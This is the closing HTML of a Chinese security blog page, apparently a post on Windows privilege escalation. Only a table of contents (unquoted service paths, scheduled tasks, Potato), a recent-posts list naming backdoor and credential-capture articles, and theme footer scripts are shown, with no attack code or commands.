class="level-item">可执行文件路径存在空格但是没有用引号</span></span></a></li></ul></li><li><a class="level is-mobile" href="#其他错误配置导致的提权"><span class="level-left"><span class="level-item">4</span><span class="level-item">其他错误配置导致的提权</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#计划任务"><span class="level-left"><span class="level-item">4.1</span><span class="level-item">计划任务</span></span></a></li><li><a class="level is-mobile" href="#Potato"><span class="level-left"><span class="level-item">4.2</span><span class="level-item">Potato</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-27T08:36:42.000Z">2024-11-27</time></p><p class="title"><a href="/2024/11/27/%E4%B8%80%E6%AC%BELinux%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8%E5%9E%8B%E9%9A%90%E8%94%BD%E5%90%8E%E9%97%A8/">一款Linux端口复用型隐蔽后门</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-27T06:36:42.000Z">2024-11-27</time></p><p class="title"><a href="/2024/11/27/Linux%E7%B3%BB%E7%BB%9F%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8%E5%8E%9F%E7%90%86/">Linux端口复用原理</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-18T06:36:42.000Z">2024-11-18</time></p><p class="title"><a href="/2024/11/18/%E9%80%9A%E8%BF%87%E6%81%B6%E6%84%8F%E7%A8%8B%E5%BA%8F%E6%88%AA%E8%8E%B7%E8%BD%AF%E4%BB%B6%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%8F%A3%E4%BB%A4/">通过恶意程序截获软件的用户口令</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-17T08:36:42.000Z">2024-11-17</time></p><p class="title"><a href="/2024/11/17/%E5%A6%82%E4%BD%95%E8%AF%86%E5%88%ABpayload%E6%98%AF%E5%B7%B2%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E5%8A%A0%E8%BD%BD/">如何识别payload是否已在内存中加载</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-17T06:36:42.000Z">2024-11-17</time></p><p class="title"><a href="/2024/11/17/Windows%20Hooking/">Windows Hooking</a></p></div></article></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="Running Man" height="28"></a><p class="is-size-7"><span>&copy; 2024 1ue0v</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">© 2019</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>